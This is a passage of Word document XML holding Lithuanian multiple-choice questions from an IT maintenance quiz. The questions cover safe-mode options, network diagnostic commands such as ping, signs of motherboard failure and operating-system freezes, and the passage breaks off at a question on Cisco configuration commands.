        <w:t>apildomai veikia administratoriaus teisės, būtinos norint prisijungti prie interneto ir kitų tinklui priklausančių kompiuterių</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E9834" w14:textId="1E3095FE" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="02DE3A73" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tai saugusis diagnostikos režimas, kai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="563B416A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apildomai veikia tvarkyklės ir paslaugos, būtinos norint prisijungti prie interneto ir kitų tinklui priklausančių kompiuterių</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCD875" w14:textId="3F59FBAE" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="47F970C8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tai saugusis diagnostikos režimas, kai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6BA8B5CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apildomai veikia antivirusinės</w:t>
      </w:r>
      <w:r w:rsidR="008D0FB2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> programos</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir atnaujinimai, būtin</w:t>
      </w:r>
      <w:r w:rsidR="00456186" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> norint prisijungti prie interneto ir kitų tinklui priklausančių kompiuterių.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCFD3E" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F82AAA" w14:textId="3A5CA706" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="7DF3A29F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="48EB27C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kokią komandą komandinės eilutės režime reikėtų </w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>įvykdyti</w:t>
      </w:r>
      <w:r w:rsidR="48EB27C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kai norima</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="48EB27C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="00AF507C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="48EB27C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ar yra </w:t>
      </w:r>
      <w:r w:rsidR="537C4E4F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interneto ryšys</w:t>
      </w:r>
      <w:r w:rsidR="61655761" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF97D44" w14:textId="2FD95208" w:rsidR="000F5639" w:rsidRPr="005A5C28" w:rsidRDefault="000F5639" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidR="20027C10" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014774F8" w14:textId="3347295E" w:rsidR="000F5639" w:rsidRPr="005A5C28" w:rsidRDefault="000F5639" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Traceroute</w:t>
      </w:r>
      <w:r w:rsidR="20027C10" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F0AB6" w14:textId="42493620" w:rsidR="000F5639" w:rsidRPr="005A5C28" w:rsidRDefault="000F5639" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:r w:rsidR="6E4D6520" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF2DF9" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4064BE0E" w14:textId="76D2EAE0" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="00233D97" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="56E3515D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kurie požymiai rodo, kad sugedusi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000014E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pagrindin</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">kompiuterio </w:t>
      </w:r>
      <w:r w:rsidR="000014E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plokštė?</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98FB6B" w14:textId="7220633D" w:rsidR="000014E4" w:rsidRPr="005A5C28" w:rsidRDefault="000014E4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Neveikia USB jungtys, neįsijungia kompiuteris</w:t>
      </w:r>
      <w:r w:rsidR="0FE00F1B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, ne</w:t>
      </w:r>
      <w:r w:rsidR="52889354" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pasileidžia </w:t>
      </w:r>
      <w:r w:rsidR="0072162E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bazinė įvesties/išvesties sistema</w:t>
      </w:r>
      <w:r w:rsidR="52889354" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BIOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF21335" w14:textId="6D54DCAF" w:rsidR="000014E4" w:rsidRPr="005A5C28" w:rsidRDefault="58DA7996" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nepasileidžia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2217CB2A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>operacin</w:t>
      </w:r>
      <w:r w:rsidR="4EDF0CD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ė sistema (OS)</w:t>
      </w:r>
      <w:r w:rsidR="684FA2E1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, neveikia spausdintuvas, neveikia projektorius</w:t>
      </w:r>
      <w:r w:rsidR="4EDF0CD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F72581" w14:textId="2B1D2367" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="000014E4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Neveikia kompiuterio aušinimo sistema</w:t>
      </w:r>
      <w:r w:rsidR="56930CA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuterio procesorius (CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3FF36" w14:textId="77777777" w:rsidR="00AF507C" w:rsidRPr="005A5C28" w:rsidRDefault="00AF507C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A83995" w14:textId="254B3E32" w:rsidR="00233D97" w:rsidRPr="005A5C28" w:rsidRDefault="00233D97" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="1471EFBE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kurie požymiai rodo, kad</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteryje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stringa</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="21B46F49" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operacin</w:t>
      </w:r>
      <w:r w:rsidR="4F644786" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidR="7C32C72D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="21B46F49" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sistem</w:t>
      </w:r>
      <w:r w:rsidR="0B3DF907" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="21B46F49" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> darb</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="21B46F49" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57367761" w14:textId="14B10A68" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="21B46F49" w:rsidP="00704E3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Operacinės sistemos tikrinimas antivirusine programine įranga, nestabilios tvarkyklės (drivers);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678BA022" w14:textId="4041D19B" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="21B46F49" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Neplanuotas operacinės sistemos paleidimas iš naujo diegiant atnaujinimus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF73B53" w14:textId="1592A8E6" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="21B46F49" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kietojo disko (HDD, SSD) gedimai, operacinės sistemos resursus naudojantys procesai, Windows Explorer vedlio klaida, operatyvinės atminties gedimai, operacinės sistemos automatinis atnaujinimas ir automatinis paleidimas iš naujo, greitasis paleidimas (Fast Startup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D197B2" w14:textId="5D7B1891" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="3B95156D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3808038B" w14:textId="0F42B104" w:rsidR="00233D97" w:rsidRPr="005A5C28" w:rsidRDefault="7ECBB8BB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00FE0B26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco tinklo įrangos nustatymų komand</w:t>
      </w:r>
      <w:r w:rsidR="00FE0B26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C014A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE0B26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>naudojama</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F61F9A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kuriant</w:t>
      </w:r>
